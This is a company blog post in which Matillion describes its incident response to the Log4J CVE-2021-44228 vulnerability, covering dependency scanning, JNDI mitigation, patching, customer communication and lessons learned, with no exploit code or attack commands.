Skip to main content

Lessons Learned from the Log4J Vulnerability

 

Early on December 9, 2021, Chen Zhaojun of the Alibaba Cloud Security team announced to the world the discovery of CVE-2021-44228, a new zero-day vulnerability in Log4J impacting all versions earlier than 2.14.1-rc2 (and newer than 1.x). The vulnerability allowed for arbitrary remote-code execution. As Log4j is one of the most commonly used JARs in the tech world, this announcement sent shockwaves across the entire tech industry.

 

Matillion is no different from other tech companies, and we took notice.  While we exercise and test our response and patching capability on a regular basis, we had not previously been challenged at this scale and urgency.

 

A proof of concept exploit for this vulnerability was published early on in the incident, so we knew it would only be a matter of time before more sophisticated attacks materialized.

Notification

 

The scale and severity of this vulnerability meant that we were notified from a range of different sources. First, our ties with the security and tech industry alerted us to circulating stories across smaller media outlets; second, our customer success organization began to receive reports and requests for comment; third,  our vendors sent questions onwards to Matillion. 

Mobilization 

 

We quickly mobilized a team to triage and remediate the vulnerability, invoking our incident management process. We activated  the necessary avenues for collaboration: a Jira record, our Slack channel and standing zoom calls.

 

We immediately began two concurrent processes. First, we wanted to understand the extent of the vulnerability within our environment and product so that we could protect our customers and ourselves. Second, we wanted to ensure that if the vulnerability was present in any of our systems, it was not being actively exploited. 

 

Our engineering and SRE teams began the process of confirming our attack surface across our range of products and services, while our security team translated open source indicators of compromise to DataDog rules to look for any indicators of compromise.

 

Finally, as a cloud-native, SaaS-first company we were aware that our supply chain could be vulnerable. Our Governance, Risk, and Compliance team engaged with key suppliers to understand their exposure and confirm that they had not been exploited and allow us to assess our risk.

 

Matillion hosts a range of products and understanding our potentially vulnerable attack surface across each product was important: 


Matillion ETL is delivered as a set of machine images available to use on popular cloud platforms (AWS, GCP, and Azure).  As the image is deployed inside a customer VPC and not internet facing, this deployment profile reduces the immediate risk to our customers, but perimeter security should not be relied upon. 

 

Matillion Hub and Billing is a set of cloud services that allow our customers to administer their accounts, users, and instances.  This set of services could potentially be exploited if the Log4J vulnerability were present.  However, these services are not implemented in Java and so were not susceptible to this vulnerability. 


Matillion Data Loader and Change Data Capture are software services that allow customers to perform data loading and streaming operations and are deployed in a hybrid architecture, with some components being cloud-based while agents are deployed in the customer’s environment.

Confirmation

 

At Matillion we use Snyk as a software composition analysis tool to scan our source projects for vulnerable build dependencies.  While we already knew that large parts of our java codebase use java.util.logging rather than Log4J, we needed to confirm that transitive dependencies did not directly pull this library into our runtime.  So we tackled the problem from both directions by executing scans of our binary repos in parallel with source code dependency scans.  We used  additional software provided by the community to scan fat JAR files for additional dependencies. With over 250 releases and versions of our products, it  took some time to assess  the exposure of this library.

 

Our alerting configured within DataDog began to pick up on activity from the white hat community probing for vulnerabile instances of Log4J, giving us confirmation that our rules were sensitive enough and functioning as expected. 

Remediation

 

The source code scans immediately identified dependencies on vulnerable versions of Log4J in Matillion Data Loader, Partner Connect and some internal services.  Within a few hours we deployed configuration changes in production to disable JNDI lookups as an immediate mitigation for this vulnerability.  We also deployed patched versions of all services to production by the end of the following business day.

 

In parallel, scans of our binary repositories identified a specific third-party driver that pulls in a vulnerable version of Log4J into a specific image of Matillion ETL. We immediately engaged with the partner to obtain a patched version of this driver.  As soon as the partner was able to provide an updated driver, we tested and released an updated version of Matillion ETL to complete remediation.

Customer Communication

 

As expected, customers and partners began contacting Matillion through various channels once they learned of the vulnerability.  It was critical for Matillion to provide a unified and consistent message through these channels.  Early on we engaged a cross-functional communications team with a single lead across our Security, Customer, and Marketing teams to craft the appropriate communications and to provide clear updates to the customer and partner organizations.  

This team provided updated communications every few hours throughout the incident. In addition, we provided a detailed update in the tech notes section of our product documentation to which  customer support could point customers. As requests came in, we continued to provide live updates in our documentation to best advise our customers.

Post-mortem Analysis

 

The scenario for handling such a ubiquitous and severe vulnerability is often the subject of tabletop exercises.  In reality, the response can be messy, with participants stepping over each other, sending engineers in opposing directions, and providing confusing customer communication. 

The need for urgency and parallelism in response is a root cause of some of these pitfalls.  Here are some learnings we took away from our response to this incident:

Clarify roles

From the outset, Matillion’s CISO organization led the response to this issue as a security incident, involving key stakeholders, coordinating activities, and providing communications to the larger organization.  The team clarified priorities, drove decision making as needed, and drafted frequent customer communications.  This type of leadership is of paramount importance to avoid wasting time and resources. We employ a general principle of GOLD/SILVER and BRONZE command levels in our incident response, but we also learned that we need to continue to hone our skills through regular testing and rehearsal.

 

Use real-time collaboration tools

In order for the response team (and observers and stakeholders) to be unified in response, we created a single set of collaboration channels to which we referred internal audiences.  As the incident grew in size, this channel became congested and slowed decision making; carving out channels for operational and tactical decision making was key.

 

Communicate with the community 

As nearly the entire tech community was dealing with a common issue, we engaged with tech channels for updates as the community at large provided updates on learnings about the vulnerability and mitigations as they happened.  Sharing of mitigations, code scanning tooling, and event detection rules across the industry was vital in limiting the risk of this vulnerability and shortening the time to mitigate it.  An open collaborative approach is often best suited to dealing with common problems, and this case was no exception.

 

Single source of truth for customers 

As we provided recurring updates to our customers and partners about the status of our response, we needed to keep the various customer channels in sync to  minimize the risk of confusion. It was essential to  maintain a single source of information and communicate that throughout the organization.  

 

Learn more about Matillion Security

 

For more information about Matillion’s security posture, please visit our Security Center at www.matillion.com/security.

{demandbase.company_name}, realize the value of your Cloud Data Platform
With Matillion, {demandbase.company_name} can leverage a low-code/no-code platform to load, transform, orchestrate, and sync data with speed at scale, to get the most value across your cloud ecosystem. Check out these resources to learn more.